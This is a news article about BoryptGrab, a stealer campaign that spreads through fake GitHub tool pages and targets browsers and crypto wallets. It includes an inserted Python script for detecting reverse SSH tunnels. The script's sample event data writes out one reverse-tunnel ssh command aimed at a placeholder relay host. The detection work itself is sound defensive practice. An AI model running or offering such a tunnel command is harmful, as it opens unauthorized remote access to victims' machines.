
Fake tools on GitHub are being used to raid Chrome, Microsoft Edge, and Brave browsers, to wipe your crypto wallets.
There’s a new predator stalking the Windows ecosystem. Security researchers at Trend Micro have identified a sophisticated malware family emerging from the digital underground to steal sensitive information.
The malware targets a total of 9 browsers, including Chrome, Microsoft Edge, and Brave, stealing saved passwords and credit card details, and even taking screenshots of your activity.
The malware scans the hard drive to hunt down cryptocurrency wallets, targeting over 30 platforms, including the giants Binance, Trezor, and Electrum. If you’re holding assets there, you’re officially on the radar.
Beyond financial data, the thieves are interested in digital identity. The software extracts Discord tokens and Telegram files, allowing attackers to hijack the victim’s social and professional communications.
It is highly likely that the attackers behind the campaign are in Russia. The researchers discovered Russian-language comments in the source code, and the servers used by the campaign are physically located in Russia.
What browsers are affected by the malware?
- Brave Browser
- CentBrowser
- Chromium
- Google Chrome
- Microsoft Edge
- Mozilla Firefox
- Opera
- Vivaldi
- Yandex Browser
Not everything in Google search results is safe
The attackers have deployed more than 100 public GitHub repositories with fake “free tool” download sites. The pages are optimized with keywords to ensure they appear at the top of search engine results.
Users searching for the newest software tools or other high-demand queries are directed to a "github-io" page. These pages are designed to mimic the professional look of official documentation, but the ZIP files they offer are packed with Trojan malware.
“By tracing the infection chain, we were able to observe several ZIP archive files masquerading as common software tools,” the researchers said.
The campaign, dubbed BoryptGrab, has a broad reach, targeting victims through everything from gaming "hacks" to legitimate applications like VMware, Krita, Filmora, and Voicemod.
The full list of software names the campaign uses as lures:
- Valorant Performance Boost / FPS Booster
- Voicemod Pro Download Tool
- Wondershare “Info Feel”
- SkinChanger for CS2
- CoD Black Ops 6 Aimbot with ESP Tool
- ABI Free ESP Tool
- Arena Breakout Cheat
- Git Deployer App
- Valorant Skin Tool
- Filmora Watermark Remover
- R6 Siege Free ESP Tool
- Vmware download
- Passathook CS2
- Meta Skins
- CS2 Skin Changer Premium
“The earliest ZIP file we identified dates to late 2025, while the initial commit of the earliest GitHub repository account was made in April 2025,” the researchers said.
The second stage of the attack is even more troubling. Some variants of BoryptGrab install a backdoor called TunnesshClient.
Written in Python and disguised as a standard system file, this "backdoor" creates a reverse Secure Shell (SSH) tunnel that allows an attacker to communicate with the victim's computer.
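As an added illustration (not code from the article or from Trend Micro's report), the following detection sketch flags the process pattern described above: an SSH client launched with remote port forwarding (`-R`) from a Python parent. The event format, file paths and host names are constructed placeholders, and the sketch assumes the tunnel is built by invoking an ssh client binary; a backdoor that speaks SSH through a library would leave no such child process and would need network-level detection instead.

```python
import json
import ntpath
import shlex

SSH_CLIENTS = {"ssh.exe", "ssh", "plink.exe", "plink"}
PYTHON_IMAGES = ("python", "pythonw")

# Constructed process-creation events (JSON lines) in an EDR/Sysmon-like shape.
# None of these are real BoryptGrab/TunnesshClient artifacts; all paths and
# hosts are placeholders.
SAMPLE_EVENTS = r"""
{"pid": 4120, "ppid": 3980, "image": "C:\\Windows\\System32\\svchost.exe", "parent_image": "C:\\Windows\\System32\\services.exe", "cmdline": "svchost.exe -k netsvcs"}
{"pid": 5210, "ppid": 5100, "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\pythonw.exe", "parent_image": "C:\\Users\\alice\\Downloads\\VoicemodPro\\setup.exe", "cmdline": "pythonw.exe sysupdate.py"}
{"pid": 5333, "ppid": 5210, "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "parent_image": "C:\\Users\\alice\\AppData\\Local\\Temp\\pythonw.exe", "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 user@relay.example -o StrictHostKeyChecking=no"}
{"pid": 6001, "ppid": 800, "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "ssh.exe admin@build.example"}
"""

def basename(path):
    # ntpath accepts both "\" and "/" separators, so Windows and POSIX paths work
    return ntpath.basename(path).lower()

def has_remote_forward(cmdline):
    """True if an ssh-style command line requests remote (reverse) port forwarding."""
    tokens = shlex.split(cmdline, posix=False)   # posix=False keeps Windows backslashes intact
    for i, tok in enumerate(tokens):
        if tok == "-R" and i + 1 < len(tokens):  # "-R 2222:127.0.0.1:22"
            return True
        if tok.startswith("-R") and len(tok) > 2:  # "-R2222:127.0.0.1:22"
            return True
    return False

def find_reverse_ssh_tunnels(events_text):
    """Return one finding per SSH client process that looks like a reverse tunnel."""
    findings = []
    for line in events_text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if basename(ev["image"]) not in SSH_CLIENTS:
            continue
        reasons = []
        if has_remote_forward(ev["cmdline"]):
            reasons.append("remote_forwarding")
        if basename(ev["parent_image"]).startswith(PYTHON_IMAGES):
            reasons.append("python_parent")
        if reasons:
            severity = "high" if len(reasons) == 2 else "medium"
            findings.append({"pid": ev["pid"], "reasons": reasons, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in find_reverse_ssh_tunnels(SAMPLE_EVENTS):
        print(f)
```

Run against the constructed sample, only the ssh.exe child of the Temp-resident pythonw.exe is reported; the interactive ssh session started from cmd.exe is left alone because it requests no remote forwarding.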
These crypto wallets are targeted by the malicious campaign:
- Armory Wallet
- Atomic
- AtomicDEX
- Binance
- Bitcoin Core
- BitPay
- Blockstream Green
- Chia Wallet
- Coinomi
- Copay
- Daedalus Mainnet
- Dash Core
- Dogecoin
- Electron Cash
- Electrum
- ElectrumLTC
- Ethereum
- Exodus
- GreenAddress
- Guarda
- Jaxx Desktop
- Komodo Wallet
- Ledger Live
- Ledger Wallet
- Litecoin Core
- MEW Desktop
- MultiDoge
- MyEtherWallet
- NOW Wallet
- Raven Core
- StakeCube
- Trezor Suite
- Wasabi Wallet
The researchers highlight that the BoryptGrab campaign illustrates an evolving threat ecosystem.
“Threat actors increasingly exploit trust in legitimate developer platforms and open‑source ecosystems,” they warned.
“With dozens of repositories, shifting payloads, and numerous build names observed in the wild, the operation’s scale indicates an active and ongoing threat,” they added.